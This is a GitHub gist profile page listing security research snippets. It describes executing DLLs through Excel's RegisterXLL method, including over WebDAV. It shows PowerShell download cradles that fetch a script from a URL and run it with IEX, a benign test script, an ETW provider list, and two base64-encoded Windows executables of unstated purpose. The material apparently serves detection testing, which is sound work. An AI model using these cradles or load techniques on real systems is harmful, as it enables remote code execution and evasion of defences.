Skip to content

Instantly share code, notes, and snippets.

View Heirhabarov's full-sized avatar

Heirhabarov

7 followers · 0 following
View GitHub Profile
@Heirhabarov
Heirhabarov / ExcelXLL.md
Created January 8, 2018 22:39 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@Heirhabarov
Heirhabarov / DownloadCradles.ps1
Last active September 7, 2023 11:35 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
################################################## System.Net. cradles ##################################################
# System.Net.Webclient DownloadString
IEX (New-Object Net.Webclient).DownloadString('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')
# System.Net.Webclient DownloadData
IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')))
$test = (New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st
# System.Net.Webclient DownloadFile (touches disk)
@Heirhabarov
Heirhabarov / TestPSScript.ps1
Created June 1, 2019 17:01
Write-Host "Hello from PowerShell!!!"
Get-Process
@Heirhabarov
Heirhabarov / XmlDocument_PowerShell.xml
Last active June 1, 2019 19:44
<?xml version="1.0"?>
<command>
<a>
<execute>Write-Host "Hello from PowerShell!!!"; Get-Process</execute>
</a>
</command>
@Heirhabarov
Heirhabarov / NiftyETWProviders.json
Created July 19, 2019 14:59 — forked from mattifestation/NiftyETWProviders.json
ETW providers you never knew existed...
[
{
"ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
"ProviderName": "AccEventTool",
"ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba",
"AssociatedFilenames": [
"accevent.exe",
"inspect.exe",
"narrator.exe",
"srh.dll"
@Heirhabarov
Heirhabarov / gist:9226d711fe3ed10bdc54e1fe81349cdf
Created June 13, 2020 23:27
This file has been truncated, but you can view the full file.
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADP7bEQi4zfQ4uM30OLjN9DNsNJQ4qM30OC9FtDlYzfQ4L0XEPNjN9DgvRKQ4GM30OC9ExDjIzfQ4uM3kMGjN9DgvRWQ4eM30OC9E1DiozfQ4L0TkOKjN9DUmljaIuM30MAAAAAAAAAAFBFAABkhgYAhVHlXgAAAAAAAAAA8AAiIAsCCQAAzAEAAKZQAAAAAAAgOQAAABAAAAAAAIABAAAAABAAAAACAAAFAAIAAAAAAAUAAgAAAAAAALBSAAAEAABOFFMAAgAAAAAAEAAAAAAAABAAAAAAAAAAABAAAAAAAAAQAAAAAAAAAAAAABAAAABQEAIAeQAAADQDAgBQAAAAAAAAAAAAAAAAcAYA8AwAAAAAAAAAAAAAAJBSAGwCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AEA4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAHssBAAAQAAAAzAEAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAMkwAAAA4AEAADIAAADQAQAAAAAAAAAAAAAAAABAAABALmRhdGEAAACgTQQAACACAAA+BAAAAgIAAAAAAAAAAAAAAAAAQAAAwC5wZGF0YQAA8AwAAABwBgAADgAAAEAGAAAAAAAAAAAAAAAAAEAAAEAueHpkYXRhAGkCTAAAgAYAAARMAABOBgAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAYEgAAAJBSAAAUAAAAUlIAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@Heirhabarov
Heirhabarov / CMDExecAssembly
Created April 4, 2021 12:40
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGJ2KlsAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAjicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADwnAABPAAAAAEAAAHgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAEJgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAHgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwJwAAAAAAAEgAAAACAAUAbCAAAJgFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZyAQAAcHIRAABwKA4AAAomKh4CKA8AAAoqAABCU0pCAQABAAAAAAAMAAAAdjIuMC41MDcyNwAAAAAFAGwAAADEAQAAI34AADACAAAYAgAAI1N0cmluZ3MAAAAASAQAAHwAAAAjVVMAxAQAABAAAAAjR1VJRAAAANQEAADEAAAAI0Jsb2IAAAAAAAAAAgAAAUcUAAAJAAAAAPoBMwAWAAABAAAAEAAAAAIAAAACAAAA